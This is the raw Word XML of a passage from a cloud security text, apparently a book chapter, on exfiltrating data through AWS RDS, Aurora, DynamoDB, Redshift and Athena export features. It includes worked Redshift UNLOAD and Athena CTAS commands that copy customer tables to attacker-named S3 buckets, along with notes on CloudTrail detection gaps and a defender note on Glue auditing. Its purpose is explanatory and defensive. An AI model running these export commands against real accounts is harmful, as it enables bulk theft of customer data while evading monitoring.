        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Figure 12.1 — Data-service exfil pathways. Each service has a snapshot / export / unload primitive that moves data out of the application trust perimeter without touching the application itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3D5629" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:divId w:val="62484993"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>RD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snapshot / expor</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DynamoD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>B</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export to S</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Redshif</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UNLOAD / cluster restor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Athen</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CTAS / Glue catalo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>g</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Cross-account shar</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bucket in attacke</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>r</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S3 UNLOAD targe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>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External table → S</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Attacker S3 or RD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CloudTrail records the service-side export onl</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p>
    <w:p w14:paraId="721F5B74" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>12.2  Aurora and the cross-account clone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380454F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Aurora clusters add a second exfiltration primitive: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>rds:StartDBClusterExport</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">. This exports the cluster's contents to an S3 bucket as Parquet, including historical Aurora backtrack data. The S3 bucket can be in any account the attacker has </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on; the export job's IAM role is specified at export time. The resulting Parquet files contain the complete dataset at row granularity; no application-layer filtering applies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193B9FA8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>12.3  DynamoDB export to S3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F68BE6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DynamoDB PITR-enabled tables support </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dynamodb:ExportTableToPointInTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, which exports the table (or a point-in-time version) to an S3 bucket as DynamoDB JSON or Ion. As with RDS export, the destination bucket can be in any account the attacker's credentials can write to. The operation is fully asynchronous; it does not impact the source table; it does not fire any data-plane alert. The sole indicators are the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ExportTableToPointInTime</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> CloudTrail event and the resulting S3 PUT events in the destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105D757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related primitive is the DynamoDB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Streams</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature. If the attacker can enable a stream on the table (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dynamodb:UpdateTable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StreamSpecification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>) and read the stream (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>dynamodb:GetRecords</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with stream ARN), they get a continuous feed of every item-level mutation. This is persistence-grade eavesdropping, not a one-shot exfil.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7066B1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>12.4  Redshift UNLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2075E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Redshift's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UNLOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">command writes query results to S3. From the database's perspective it is SQL; from the platform's perspective it is a data movement operation executed by the cluster's associated IAM role. If the attacker has SQL access (via a compromised DB user, via </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>redshift:GetClusterCredentials</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, via a misconfigured JDBC endpoint) and the cluster has an IAM role attached with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>s3:PutObject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> to any bucket, the attacker can dump arbitrary queries to S3. The defender sees only a Redshift SQL audit log entry — if SQL audit logging is enabled, which it frequently is not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B591F61" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="906112941"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>redshift=&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UNLOAD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'SELECT * FROM customers LIMIT 10000000'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75157FA3" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="906112941"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">redshift-&gt;    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>TO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'s3://attacker-staging-bucket/cust/'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54CE8148" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="906112941"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">redshift-&gt;    IAM_ROLE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>'arn:aws:iam::111122223333:role/redshift-s3-export'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114284BF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="906112941"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">redshift-&gt;    FORMAT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>PARQUET</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEB41D8" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="906112941"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">redshift-&gt;    PARALLEL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ON</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F49C69F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="906112941"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">redshift-&gt;    MAXFILESIZE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>AS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="r"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>1024</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> MB;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C55A2B9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="906112941"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="w16"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>INFO: UNLOAD completed, 23 file(s) written to S3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C504855" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="906112941"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UNLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF3B66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Redshift clusters also support cross-account snapshot sharing through </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>redshift:AuthorizeSnapshotAccess</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>, with the same mechanics as RDS. The IAM action is uncommon enough that it rarely appears in baseline Redshift IAM audits, which tend to focus on the SQL layer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A958DF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>12.5  Athena and the CTAS primitive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C3397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Athena is the quiet exfiltration service. Whoever can run </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>athena:StartQueryExecution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> against a workgroup whose result location is S3 can issue arbitrary SQL against any table the attached IAM role can reach (typically via Glue Data Catalog). A single </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>CREATE TABLE AS SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> can copy an entire Glue-cataloged dataset — including multi-terabyte data lakes backed by S3 Parquet — to an attacker-controlled S3 location with one API call. The interesting permission to look for is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>athena:StartQueryExecution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> combined with write access to any S3 bucket outside the cataloged data lake.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6180EEAF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="582224556"/>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athena start-query-execution \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A51A8F6" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="582224556"/>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --query-string </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"CREATE TABLE default.exfil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19CBA2BC" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="582224556"/>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">                   WITH (external_location='s3://attacker-staging/exfil/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342ED712" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="582224556"/>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">                         format='PARQUET')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FDA00A" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="582224556"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">                   AS SELECT * FROM prod_datalake.customer_events"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F15296" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="582224556"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --work-group primary \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFA0BC0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="582224556"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">    --result-configuration OutputLocation=s3://athena-results/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A1949F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="582224556"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">{ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="k"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"QueryExecutionId"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"abcdef12-..."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCF89B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Athena CTAS has a second attribute that matters operationally: the scale limits are what the Athena service imposes, not what the compromised identity's usual workload looks like. A CTAS that produces a terabyte of output is indistinguishable, from CloudTrail's perspective, from one that produces a gigabyte — they are both one </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>StartQueryExecution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E388FA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="13727053"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Defender note: Glue Data Catalog surface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0AA195" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="13727053"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>When auditing Athena, also audit Glue: Athena's effective read scope is determined by Glue Data Catalog permissions (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>glue:GetTable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>glue:GetPartitions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">) combined with the S3 permissions of the Athena workgroup's IAM role. A common misconfiguration is a workgroup role that reads an entire data-lake bucket because "the business wanted flexibility", combined with a wide </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>glue:Get*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
